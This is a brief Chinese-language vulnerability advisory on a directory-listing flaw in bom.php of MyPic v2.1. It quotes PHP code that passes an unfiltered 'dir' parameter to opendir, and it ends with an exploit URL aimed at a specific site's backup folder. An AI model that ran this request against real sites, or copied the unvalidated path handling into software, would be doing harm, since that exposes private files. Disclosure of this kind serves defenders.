MyPic v2.1遍历文件漏洞

官方网站： http://www.diqiye.com/mypic/

漏洞说明：
/bom.php (文件没做任何访问限制)
  
Code:
if (isset($_GET['dir'])){ //config the basedir
     $basedir=$_GET['dir'];//这个没做过滤可以输入任何目录
}else{
     $basedir = '.';
}

$auto = 1;

checkdir($basedir);

function checkdir($basedir){
     if ($dh = opendir($basedir)) {
         while (($file = readdir($dh)) !== false) {
             if ($file != '.' && $file != '..'){
                 if (!is_dir($basedir."/".$file)) {
                     echo "filename: $basedir/

$file ".checkBOM("$basedir/$file")." <br>";
                 }else{
                     $dirname = $basedir."/".

$file;
                     checkdir($dirname);
                 }
             }
         }
     closedir($dh);
     }
}
......
function rewrite ($filename, $data) {
     $filenum = fopen($filename, "w");
     flock($filenum, LOCK_EX);
     fwrite($filenum, $data);
     fclose($filenum);
}

Exp : http://www.iick.blog/mypic1/bom.php?dir=./data/bak/